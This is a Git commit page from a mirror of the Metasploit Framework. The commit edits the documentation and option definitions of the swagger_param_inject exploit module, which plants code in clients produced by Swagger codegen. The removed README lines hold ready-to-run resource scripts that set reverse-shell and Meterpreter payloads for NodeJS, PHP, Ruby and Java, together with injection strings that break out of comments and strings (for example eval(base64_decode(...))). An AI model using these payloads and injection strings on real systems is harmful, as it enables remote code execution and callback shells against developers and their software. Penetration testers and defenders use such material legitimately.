infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated as per @egypt & @todb-r7 recommendations.

bug/bundler_fix
Scott Lee Davis 2016-06-23 11:41:54 -04:00
parent e9e4e7d069
commit fbd0bc4308
2 changed files with 5 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md Normal file → Executable file
View File

@ -32,70 +32,18 @@ This attack looks to inject a payload into javascript by terminating a URL path
[nodejs-codegen](nodejs-codegen.rc)
```
set PAYLOAD nodejs/shell_reverse_tcp
set PAYLOAD nodejs/shell_reverse_tcp
use exploit/multi/fileformat/swagger_param_inject
set INFO_VERSION "1.0.0"
set PAYLOAD_LOC "PATH"
set PAYLOAD_PREFIX "/a');};};return exports;}));"
set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
set SWAGGER_HOST "localhost"
run
```
**PHP**
This attack takes advantage of injection of variables into multiline comment area.
[php-codegen](php-codegen.rc)
```
set PAYLOAD php/meterpreter/reverse_tcp
use exploit/multi/fileformat/swagger_param_inject
set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
set PAYLOAD_SUFFIX "')); /*"
run
```
**Ruby**
This attack takes advantage of injection of variables into multiline comment area.
[ruby-codegen](ruby-codegen.rc)
```
set PAYLOAD ruby/shell_reverse_tcp
use exploit/multi/fileformat/swagger_param_inject
set PAYLOAD_LOC "INFO_TITLE"
set PAYLOAD_PREFIX "=end "
set INFO_DESCRIPTION "=begin "
run
```
**Java**
This attack looks to inject a payload into javascript by terminating a URL path string, and placing code inline without causing runtime errors.
[java-codegen](java-codegen.rc)
```
set PAYLOAD java/jsp_shell_reverse_tcp
use exploit/multi/fileformat/swagger_param_inject
set PAYLOAD_LOC "PATH"
set PAYLOAD_PREFIX "a\\\"; "
run
```
## Quick Test

5
modules/exploits/multi/fileformat/swagger_param_inject.rb Normal file → Executable file
View File

@ -50,15 +50,14 @@ class MetasploitModule < Msf::Exploit::Remote
[
OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
OptPort.new('LPORT', [true, 'Server port.']),
OptString.new('PAYLOAD', [false, 'Payload Injection']),
OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']),
OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]),
OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4', 'X.Y.Z.xyz']),
OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']),
OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']),
OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),